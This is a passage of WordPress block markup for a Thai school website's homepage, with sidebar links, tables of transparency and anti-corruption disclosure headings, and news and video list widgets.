{\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\"